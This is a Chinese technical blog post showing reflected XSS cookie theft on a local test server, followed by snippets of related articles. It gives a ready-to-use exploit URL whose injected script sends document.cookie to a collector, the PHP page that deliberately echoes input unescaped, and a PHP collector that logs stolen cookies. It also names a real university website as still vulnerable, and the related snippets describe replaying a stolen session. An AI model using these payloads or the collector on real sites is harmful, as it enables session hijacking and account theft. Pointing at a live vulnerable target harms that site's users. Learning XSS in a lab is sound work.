反射型xss偷取cookie(本地验证)

最新推荐文章于 2024-07-10 17:05:37 发布
最新推荐文章于 2024-07-10 17:05:37 发布
阅读量3.1k 收藏 1
点赞数 1
分类专栏: web 文章标签: 反射型xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/49840219
版权

原理

反射型xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。

本地验证

xss漏洞地址:http://localhost/njuptsta/xss/reflect_xss.php?name=1
黑客收集cookie地址:http://localhost/1.php?c=
构造的url exploit :

值得注意的一点:

shellcode里面cookie和原始url连接的时候,用的是+
然而在浏览器的地址栏里,+可能被解析成空格。
所以我们需要把+替换成url编码%2b
这一点值得注意,花了两个晚上最后还是求助的别人才发现的。
—2015年11月16号更新。

http://localhost/njuptsta/xss/reflect_xss.php?name=1<script>document.location="http://localhost/1.php?c="%2bdocument.cookie</script>
源码:反射型xss漏洞

将用户输入显示在当前页面,存在反射型xss漏洞。

<html>
<body>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<form method = "get" action = "reflect_xss.php">
反射型xss<br>
<input type = "text" name = "name"><br>
<input type = "submit">
</form>
<?php
echo $_GET['name'];
?>
</body>
</html>
源码:黑客收集cookie
<?php
    $cookie = $_GET['c'];
    $myfile = fopen("testfile.txt", "a");
    fwrite($myfile, "cookie:".$cookie."\n");
    fclose($myfile);
?>
反射型xss漏洞存在地址:

http://jwc.shcmusic.edu.cn/plus/Search.asp?searchtype=1&channelid=1&KeyWord=123

think_ycx
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1850
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
-----已搬运-----反射xss获取cookie(本地实现)
Zero_Adam的博客
02-17 2199
目录:1.最简单的反射性xss获取cookie注意!!!! 1.最简单的反射性xss获取cookie <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'
XSS ———— (二)利用反射XSS窃取用户Cookie信息并利用
weixin_43102772的博客
02-27 1135
思路: 搭建能接收cookie的服务器 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie并利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端 小试牛刀: 一、搭建服务器 1. kali开启Apache服务 systemctl start a...
4.XSS-反射(get)利用:获取cookie
愿听风成曲
06-23 378
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。修改一下配置文件\pikachu\pkxss\xcookie\cookie.php。就能获取到用户的IP,cookie值,refer二,ua等相关信息。输入基于域名的搭建的pkxss,在搜索框里输入链接。可以将referer的链接发送给对应的要攻击的用户。基于IP搭建的pkxss平台(入侵者的IP地址)在皮卡丘里面的xss后台进入cookie收集。我这里基于域名搭建的pkxss平台。
网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了
最新发布
HUANGXIN9898的博客
07-10 1277
渗透测试-地基篇:该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
5.XSS-反射(post)利用:获取cookie
愿听风成曲
06-23 323
需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post链接上;将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件。文件路径:\pikachu\pkxss\xcookie\post.html。在pkxss平台直接获取用户信息。用户误以为是正常网站去访问。基于IP地址配置文件。
简单的利用XSS获取用户cookie
shy的博客
10-25 4321
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
搜索框——不能忽视的XSS漏洞—搜索框所引起的XSS漏洞
06-12
5. **使用X-XSS-Protection头**:开启浏览器的XSS防护机制,可拦截一些简单的反射XSS攻击。 6. **安全编程原则**:遵循“不要相信任何用户输入”的原则,对所有用户数据持怀疑态度。 总之,XSS漏洞不容忽视,尤其...
网络攻击(SQL攻击、XSS、CSRF、DDos)
哈尼熊熊的博客
03-14 4135
1)   SQL注入攻击(SQLInjection)攻击方法: 攻击者在HTTP请求中注入恶意SQL命令,服务器用请求参数构造数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防范方法: 1.      检查变量数据类和格式,过滤特殊语句和防XSS攻击一样,请求参数消毒是一种比较简单粗暴又有效的手段。通过正则匹配,过滤请求数据中可能注入的SQL,如:drop table 等。2.   ...
XSS跨站脚本攻击的成因与防范技术
# 1. 理解XSS攻击 XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web安全漏洞,攻击者通过在目标网站植入恶意脚本,来...XSS攻击可以分为存储反射和基于DOM的三种类,攻击原理主要是攻击者利用未经转
Web安全基础:跨站脚本攻击(XSS)与防范
这些安全威胁包括但不限于跨站脚本攻击(XSS)、SQL注入、跨站请求伪造(CSRF)等。 ### 1.2 Web安全的重要性 Web安全的重要性在于保护用户的隐私信息、防止数据泄露、阻止恶意软件传播,保护
XSS获取COOKIE
04-20
XSS获取COOKIE
【猫客工作室】xss跨站进行cookies欺骗进后台
01-12
【猫客工作室】xss跨站进行cookies欺骗进后台
作为一个测试人需要知道的安全测试
qq_44411339的博客
07-06 1452
在所有类的软件测试中,安全测试可以被认为是最重要的测试之一,其主要目的是在任何软件(Web或基于网络)的应用程序中找到漏洞,并保护其数据免受可额能的攻击或入侵,忧郁许多应用程序包含机密数据,需要被保护,因此需要定期在这样的应用层下上开展健全测试。流动可以被定义为任何系统的弱点(Vulnerability),入侵者或破坏者可以通过该漏洞对系统进行攻击。如果系统没有严格执行安全性测试,那么出现漏洞的机会增加。可以通过打补丁或修复程序来防止系统出现漏洞。WebShell就是以asp、php、jsp或者cgi等网
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1476
好切回正题,这段代码的是正则表达意思就是把这些'/
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4491
演示用靶场:dvwa
XSS之截获某用户cookie信息
l31299的博客
05-28 2858
XSS反射攻击方式实例
pikachu靶场之反射XSScookie盗取)
weixin_45705209的博客
08-20 1987
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。 利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
XSS入侵服务器盗取用户cookie
hughwupan的博客
03-28 1617
XSS入侵服务器盗取用户cookie欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
反射xss反射cookie是谁的cookie
07-27
反射 XSS 是一种 Web 攻击方式...而反射 XSS 并不直接获取用户的 Cookie,而是利用用户自身浏览器发送请求时携带的 Cookie 来进行攻击。因此,反射 XSS 攻击利用的是用户自己的 Cookie,而不是攻击者的 Cookie
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值